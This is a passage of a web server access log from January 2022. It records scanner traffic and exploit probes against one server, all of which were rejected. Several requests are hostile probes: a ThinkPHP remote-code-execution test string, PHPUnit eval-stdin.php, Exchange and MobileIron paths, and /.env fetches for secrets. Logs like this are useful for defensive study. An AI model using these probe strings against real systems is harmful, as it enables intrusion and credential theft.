AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Jan/2022:12:24:19 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 138.99.216.222] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [02/Jan/2022:12:24:19 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 138.99.216.222] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [02/Jan/2022:12:37:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.5] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:12:39:47 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.63] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:12:50:59 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [02/Jan/2022:13:54:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 134.122.134.188] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:13:54:29 +0000] 400 - - http localhost "-" [Client 134.122.134.188] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:13:54:37 +0000] 400 - - http localhost "-" [Client 134.122.134.188] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:13:54:44 +0000] 400 - - http localhost "-" [Client 134.122.134.188] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:13:55:02 +0000] 400 - - https localhost "-" [Client 134.122.134.188] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:13:55:26 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 134.122.134.188] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [02/Jan/2022:13:55:32 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 134.122.134.188] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [02/Jan/2022:17:32:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.152] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:17:32:47 +0000] 400 - - http localhost "-" [Client 45.146.166.188] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:17:36:04 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:17:40:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [02/Jan/2022:18:23:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:18:23:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [02/Jan/2022:18:23:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Jan/2022:18:30:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:19:39:33 +0000] 444 - GET https io.moralanimal.net "/" [Client 3.85.77.77] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 Edg/80.0.361.48" "-" [02/Jan/2022:19:39:40 +0000] 444 - HEAD https io.moralanimal.net "/favicon.ico" [Client 3.85.77.77] [Length 0] [Gzip -] "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10" "-" [02/Jan/2022:20:02:42 +0000] 444 - POST https 64.22.31.253 "/ecp/Oe.js" [Client 63.141.235.131] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1" "-" [02/Jan/2022:20:04:20 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:20:38:17 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [02/Jan/2022:20:57:33 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:21:27:41 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.213.16] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:21:31:33 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Jan/2022:22:13:34 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:22:25:24 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:22:26:08 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:22:28:26 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.219] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:23:18:00 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:23:39:24 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"